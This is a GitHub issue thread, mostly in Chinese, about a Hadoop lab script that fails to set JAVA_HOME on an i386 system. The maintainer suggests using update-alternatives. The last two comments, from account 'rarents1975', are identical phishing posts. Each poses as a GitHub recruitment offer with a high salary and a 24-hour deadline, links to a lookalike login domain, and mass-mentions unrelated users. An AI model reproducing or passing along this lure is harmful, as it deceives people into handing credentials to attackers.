### ISSUE TITLE
java環境變數的問題

### ISSUE THREAD

**Issue by EggyCheng** [jazzwang/hadoop_labs#2]
您好
再使用您寫好的程式安裝hadoop時會遇到java環境變數吃不到的問題
我把 ~/hadoop/conf.pseudo/hadoop-env.sh  第55行的JAVA環境變數改為JAVA_HOME=/usr/lib/jvm/java-7-openjdk-i386/就可以work了

**Comment by jazzwang** [comment]
跟 https://github.com/jazzwang/hadoop_labs/blob/master/lab000/hadoop-local-mode#L27 有關。
由於必須考慮不同使用者裝的 JDK 版本，將考慮透過 `update-alternatives` 指令來做調整。
謝謝建議～

**Comment by jazzwang** [comment]
像底下的 amd64 環境用的是 `/usr/lib/jvm/java-7-openjdk-amd64` 而您用的是 i386
```
root@ubuntu:~/hadoop_labs# update-alternatives --display java
java - auto mode
  link currently points to /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java
/usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java - priority 1071
  slave java.1.gz: /usr/lib/jvm/java-7-openjdk-amd64/jre/man/man1/java.1.gz
Current 'best' version is '/usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java'.
```

**Comment by rarents1975** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
izumori, @imprasukjain, @akhileshkumar07, @lokmantsui, @antonmosin, @himanshuchauhan1729, @Desperado-Jia, @pariigh, @serige, @kanshi, @arminta7, @Erwin-X, @miaow1988, @WhiteCipher, @YangWang92, @dmamayeva, @b0o, @AdrishMaity, @daikichiba9511, @devloper13

**Comment by rarents1975** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
nkmry, @ronikeuru, @mIbrahim017, @husisy, @shihaoyin, @yusufakajose, @pandeyAayush, @eyrexh, @Unathi-Skosana, @LegendBC, @nastynaz, @htcooper, @raininglemons, @rishsriv, @ChenyuL, @npogosski, @jaihuayen, @gregmanley, @HEA1OR, @AtomicVar
